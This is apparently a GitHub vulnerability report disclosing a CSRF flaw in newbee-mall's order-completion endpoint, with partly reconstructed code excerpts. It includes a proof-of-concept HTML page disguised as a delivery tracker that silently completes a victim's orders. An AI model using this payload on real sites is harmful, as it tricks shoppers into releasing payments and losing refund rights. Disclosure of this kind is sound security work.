
CSRF Vulnerability in Order Completion #109

@flashzyc

Summary

A CSRF vulnerability exists in the order completion endpoint /orders/{orderNo}/finish. Because the request is authenticated by the session cookie alone, an attacker can cause a logged-in user to mark orders as completed before the goods are received, which releases the payment to the merchant and makes refund claims difficult.

Vulnerability Details

Configuration-Level Issue

File: src/main/java/ltd/newbee/mall/config/NeeBeeMallWebMvcConfigurer.java

import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.context.annotation.Configuration;
import org.springframework.web.servlet.config.annotation.InterceptorRegistry;
import org.springframework.web.servlet.config.annotation.WebMvcConfigurer;

@Configuration
public class NeeBeeMallWebMvcConfigurer implements WebMvcConfigurer {
    @Autowired
    private NewBeeMallLoginInterceptor newBeeMallLoginInterceptor; // interceptor type assumed from the bean name

    @Override
    public void addInterceptors(InterceptorRegistry registry) {
        // The login interceptor only checks that a session exists; it cannot tell a
        // user-initiated request from a cross-site one carrying the same cookie.
        registry.addInterceptor(newBeeMallLoginInterceptor)
                .addPathPatterns("/orders/**");
        // ❌ No CSRF protection mechanism
    }
}

Endpoint-Level Code Analysis

File: src/main/java/ltd/newbee/mall/controller/mall/OrderController.java (Lines 97-107)

@PutMapping("/orders/{orderNo}/finish")
@ResponseBody
public Result finishOrder(@PathVariable("orderNo") String orderNo, HttpSession httpSession) {
    NewBeeMallUserVO user = (NewBeeMallUserVO) httpSession.getAttribute(Constants.MALL_USER_SESSION_KEY);
    // ❌ No CSRF token validation
    // ⚠️ Completes order without verification of actual delivery
    String finishOrderResult = newBeeMallOrderService.finishOrder(orderNo, user.getUserId());
    if (ServiceResultEnum.SUCCESS.getResult().equals(finishOrderResult)) {
        return ResultGenerator.genSuccessResult();
    } else {
        return ResultGenerator.genFailResult(finishOrderResult);
    }
}

Security Issues:

  1. ❌ No CSRF token validation
  2. ⚠️ No additional confirmation required for order completion
  3. ⚠️ Premature completion releases payment to merchant

Proof of Concept (PoC)

<!DOCTYPE html>
<html>
<head>
    <title>Order Tracking System</title>
</head>
<body>
    <h2>📦 Tracking Your Delivery</h2>
    <p>Updating delivery status...</p>
    
    <script>
        // Finish multiple recent orders
        var orderNumbers = [
            '202602051645001',
            '202602051645002',
            '202602051645003'
        ];
        
        orderNumbers.forEach(function(orderNo) {
            fetch('http://localhost:28089/orders/' + orderNo + '/finish', {
                method: 'PUT',
                credentials: 'include'
            })
            .then(response => response.json())
            .then(data => console.log('Order ' + orderNo + ' completed'));
        });
        
        setTimeout(function() {
            document.body.innerHTML = '<h3>✅ Delivery status updated successfully!</h3>';
        }, 2000);
    </script>
</body>
</html>

Impact

Premature order completion and payment release: users lose buyer protection and have difficulty obtaining refunds if goods are not received or are defective.

CVSS Score: 7.4 (High)
